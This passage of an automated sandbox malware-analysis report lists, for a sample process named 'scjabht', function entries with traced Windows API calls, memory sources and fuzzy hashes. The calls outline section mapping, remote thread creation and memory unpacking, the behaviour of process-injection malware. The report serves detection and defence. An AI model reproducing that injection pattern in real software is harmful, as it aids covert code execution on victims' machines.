Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 00417460 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00417491
WritePrivateProfileStringA.KERNEL32(00419398,00419374,0041934C,0041933C), ref: 004174B5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004174BD
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004174FD
GetComputerNameW.KERNEL32(?,?), ref: 00417511
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041751F
OpenJobObjectA.KERNEL32(00000000,00000000,004193C0), ref: 0041752E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041753F

Strings

-, xrefs: 0041754C

Memory Dump Source

Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: af8605d0b3a4fb53b992738fe7becc4eb360322e70412ad4efd0eb029d8f9bbd
Instruction ID: a463e9529dcf8072e3b7220abe1072026f108712342e539d7c254fb5de8a9354
Opcode Fuzzy Hash: af8605d0b3a4fb53b992738fe7becc4eb360322e70412ad4efd0eb029d8f9bbd
Instruction Fuzzy Hash: 7A21D830A8430CABE7209F60DC85FDD7F70EB0C755F1181AAF749AA1C0CAB41AC88B59

Function 00417580 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004175B4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004175CF
HeapDestroy.KERNEL32(00000000), ref: 004175EE
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004175FD

Memory Dump Source

Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: a70025092311ae8c4b0cb20251c783b4c81ae9268d6ec19b84262a1c22d03a33
Instruction ID: 3d7b8869d9909e6524e9da05564ce57d4bd3bf1de3f4668ec111e10b9b533a75
Opcode Fuzzy Hash: a70025092311ae8c4b0cb20251c783b4c81ae9268d6ec19b84262a1c22d03a33
Instruction Fuzzy Hash: 4701D4B1A441089BD750EB64ED85BEA37B8EB0C746F41402AF709A7281DF742944CF59

Analysis Process: scjabhtPID: 7684, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	28.7%
Signature Coverage:	0%
Total number of Nodes:	171
Total number of Limit Nodes:	5

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 00417620 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 269
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004176F0
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417709
FindAtomW.KERNEL32(00000000), ref: 00417710
GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00417718
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00417730
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00417757
MoveFileW.KERNEL32(00000000,00000000), ref: 0041775F
GetVersionExW.KERNEL32(?), ref: 0041776C
DisconnectNamedPipe.KERNEL32(?), ref: 0041777F
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004177C4
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004177D3
LCMapStringA.KERNEL32(00000000,00000000,004193C8,00000000,?,00000000), ref: 004177E9
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 004177FB
PulseEvent.KERNEL32(00000000), ref: 0041780B
SetCommState.KERNELBASE(00000000,00000000), ref: 00417834
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00417861
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00417872
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041787A
LoadLibraryA.KERNELBASE(004193F8), ref: 00417912

Strings

}$, xrefs: 00417967
k`, xrefs: 00417943

Memory Dump Source

Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd

Similarity

API ID: Console$Comm$FileReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectEventExchangeFindFontInterlockedLengthLibraryLoadModuleMoveNameNamedOutputPathPipePulseRectSearchSizeStateTypeVersion
String ID: k`$}$
API String ID: 2183200751-956986773
Opcode ID: d5ce5a5fcc1c851620d070e0cac741e21c9d104fc792eb926722b7ac6ebd6bb2
Instruction ID: ac660437b8637ef0f9ec563d52a15bda1912d96670292318996d42c4d9e3d472
Opcode Fuzzy Hash: d5ce5a5fcc1c851620d070e0cac741e21c9d104fc792eb926722b7ac6ebd6bb2
Instruction Fuzzy Hash: DF91F371C46528ABC721AB65EC48ADF7B78EF49351F01806EF509A7150CB381A86CFED

Function 02B7003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02B7024D

Strings

kernel32.dll, xrefs: 02B7008F, 02B70095
cess, xrefs: 02B7018D

Memory Dump Source

Source File: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2b70000_scjabht.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 6718812b52abe0641362ebbcc5b0e69383259bb58732ae1b3e100e543b30e802
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 70527A74A01229DFDB64CF58C984BACBBB1BF09304F1484DAE95DAB351DB30AA85DF14

Function 004178E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(004193F8), ref: 00417912
InterlockedDecrement.KERNEL32(?), ref: 00417960

Strings

}$, xrefs: 00417967
k`, xrefs: 00417943

Memory Dump Source

Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd

Similarity

API ID: DecrementInterlockedLibraryLoad
String ID: k`$}$
API String ID: 1728580480-956986773
Opcode ID: 3003b45fd1169c669f61d0907577ac23474fafbff37243fa5960b7ee75e7cf2e
Instruction ID: 134cc60ee6fbcd4284a2d3b71c5bd9fcb84d361ebfdf38d762708a44da6be8e6
Opcode Fuzzy Hash: 3003b45fd1169c669f61d0907577ac23474fafbff37243fa5960b7ee75e7cf2e
Instruction Fuzzy Hash: EE2136B0D982158BDB309B24D8817EA7730EB49321F11447FD98997281CA3C58C9CB9D

Function 00417290 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B1AF70), ref: 0041736F
GetProcAddress.KERNEL32(00000000,0041CF58), ref: 004173AC
VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 004173CB

Strings

, xrefs: 004172D5

Memory Dump Source

Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
Instruction ID: 6495229f78f8176a921cc79dd6658c6ebdac2eeea773cb5c0c066b47575b63c9
Opcode Fuzzy Hash: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
Instruction Fuzzy Hash: 62313E559C93C4CAE301CBB8FC447553B639B29744F5484689148CB3E2D7BA252AC76E

Function 02DA0D30 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DA0D58
Module32First.KERNEL32(00000000,00000224), ref: 02DA0D78

Memory Dump Source

Source File: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d9d000_scjabht.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 5cc67af040d2298fcc91355d378f541c51f2bbbe39d0bb846c388fac1c9e3fe1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E1F09632500710AFEB203BF5989DF6E76E8AF4962AF140629E646915C0DB71FC458A61

Function 02B70E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02B70223,?,?), ref: 02B70E19
SetErrorMode.KERNELBASE(00000000,?,?,02B70223,?,?), ref: 02B70E1E

Memory Dump Source

Source File: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2b70000_scjabht.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: eea91c0eaf36b4b8d311b86b6cee36175ef086932f7dda50fde56889cc09c694
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 08D0123154512877D7003A94DC09BCD7B1CDF09B66F008451FB0DD9080C770964046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02DA09EF Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DA0A40

Memory Dump Source

Source File: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d9d000_scjabht.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c5b8d063a1978eba9eacb932917b2d030cc9338f3e11a04e099c3e67b52fc69b
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: EF112879A00208EFDB01DF98C985E98BBF5EF08351F0580A4F9489B362D371EA90DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_scjabht.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00417260 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B1AF6C,004178C4), ref: 00417268

Memory Dump Source

Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10

Non-executed Functions

Function 00417460 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00417491
WritePrivateProfileStringA.KERNEL32(00419398,00419374,0041934C,0041933C), ref: 004174B5
